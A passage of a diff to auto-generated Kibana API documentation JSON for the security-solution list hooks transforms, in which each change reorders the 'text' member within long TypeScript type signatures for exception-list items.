string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }" + "{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; 
description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }" ], "path": "packages/kbn-securitysolution-list-hooks/src/transforms/index.ts", "deprecated": false, 
@@ -66,7 +66,7 @@ "\nThis removes an id from the exceptionItem entries as ReactJS prefers to have\nan id added to them for use as a stable id. Later if we decide to change the data\nmodel to have id's within the array then this code should be removed. If not, then\nthis code should stay as an adapter for ReactJS.\n" ], "signature": [ - "(exceptionItem: T) => T" + "(exceptionItem: T) => T" ], "path": "packages/kbn-securitysolution-list-hooks/src/transforms/index.ts", "deprecated": false, 
@@ -103,7 +103,7 @@ "\nTransforms the output of rules to compensate for technical debt or UI concerns such as\nReactJS preferences for having ids within arrays if the data is not modeled that way.\n\nIf you add a new transform of the input called \"myNewTransform\" do it\nin the form of:\nflow(addIdToExceptionItemEntries, myNewTransform)(exceptionItem)\n" ], "signature": [ - "(exceptionItem: { _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; 
type: \"simple\"; updated_at: string; updated_by: string; }) => { _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }" + "(exceptionItem: { _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; 
entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }) => { _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | 
\"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }" ], "path": "packages/kbn-securitysolution-list-hooks/src/transforms/index.ts", "deprecated": false, 
@@ -118,7 +118,7 @@ "The exceptionItem to transform the output of" ], "signature": [ - "{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }" + "{ _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: 
string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; }" ], "path": "packages/kbn-securitysolution-list-hooks/src/transforms/index.ts", "deprecated": false, 
@@ -138,7 +138,7 @@ "label": "transformNewItemOutput", "description": [], "signature": [ - "(exceptionItem: { description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; list_id: string; name: string; type: \"simple\"; } & { comments?: { comment: string; }[] | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }) => { description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | 
\"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; list_id: string; name: string; type: \"simple\"; } & { comments?: { comment: string; }[] | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }" + "(exceptionItem: { description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: 
\"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; list_id: string; name: string; type: \"simple\"; } & { comments?: { comment: string; }[] | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }) => { description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; list_id: string; name: string; type: \"simple\"; } & { comments?: { comment: string; }[] | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }" ], "path": 
"packages/kbn-securitysolution-list-hooks/src/transforms/index.ts", "deprecated": false, 
@@ -151,7 +151,7 @@ "label": "exceptionItem", "description": [], "signature": [ - "{ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; list_id: string; name: string; type: \"simple\"; } & { comments?: { comment: string; }[] | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }" + "{ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | 
\"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; list_id: string; name: string; type: \"simple\"; } & { comments?: { comment: string; }[] | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; }" ], "path": "packages/kbn-securitysolution-list-hooks/src/transforms/index.ts", "deprecated": false, 
@@ -171,7 +171,7 @@ "\nTransforms the output of exception items to compensate for technical debt or UI concerns such as\nReactJS preferences for having ids within arrays if the data is not modeled that way.\n\nIf you add a new transform of the output called \"myNewTransform\" do it\nin the form of:\nflow(removeIdFromExceptionItemsEntries, myNewTransform)(exceptionItem)\n" ], "signature": [ - "(exceptionItem: { _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; 
tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; } | ({ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; name: string; type: \"simple\"; } & { _version?: string | undefined; comments?: ({ comment: string; } & { id?: string | undefined; })[] | undefined; id?: string | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; })) => { _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; 
operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; } | ({ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"text\" | \"date\" | \"keyword\" | \"ip\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: 
\"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; name: string; type: \"simple\"; } & { _version?: string | undefined; comments?: ({ comment: string; } & { id?: string | undefined; })[] | undefined; id?: string | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | \"macos\")[] | undefined; tags?: string[] | undefined; })" + "(exceptionItem: { _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } 
| { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; } | ({ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; })[]; name: string; type: \"simple\"; } & { _version?: string | undefined; comments?: ({ comment: string; } & { id?: string | undefined; })[] | undefined; id?: string | undefined; item_id?: string | undefined; meta?: object | undefined; namespace_type?: \"single\" | \"agnostic\" | undefined; os_types?: (\"windows\" | \"linux\" | 
\"macos\")[] | undefined; tags?: string[] | undefined; })) => { _version: string | undefined; comments: ({ comment: string; created_at: string; created_by: string; id: string; } & { updated_at?: string | undefined; updated_by?: string | undefined; })[]; created_at: string; created_by: string; description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | \"double\" | \"date_range\" | \"ip_range\" | \"shape\" | \"short\" | \"binary\" | \"float\" | \"half_float\" | \"integer\" | \"byte\" | \"long_range\" | \"integer_range\" | \"float_range\" | \"double_range\"; }; operator: \"excluded\" | \"included\"; type: \"list\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match\"; value: string; } | { field: string; operator: \"excluded\" | \"included\"; type: \"match_any\"; value: string[]; })[]; field: string; type: \"nested\"; } | { field: string; operator: \"excluded\" | \"included\"; type: \"wildcard\"; value: string; })[]; id: string; item_id: string; list_id: string; meta: object | undefined; name: string; namespace_type: \"single\" | \"agnostic\"; os_types: (\"windows\" | \"linux\" | \"macos\")[]; tags: string[]; tie_breaker_id: string; type: \"simple\"; updated_at: string; updated_by: string; } | ({ description: string; entries: ({ field: string; operator: \"excluded\" | \"included\"; type: \"exists\"; } | { field: string; list: { id: string; type: \"boolean\" | \"date\" | \"keyword\" | \"ip\" | \"text\" | \"geo_point\" | \"geo_shape\" | \"date_nanos\" | \"long\" | 
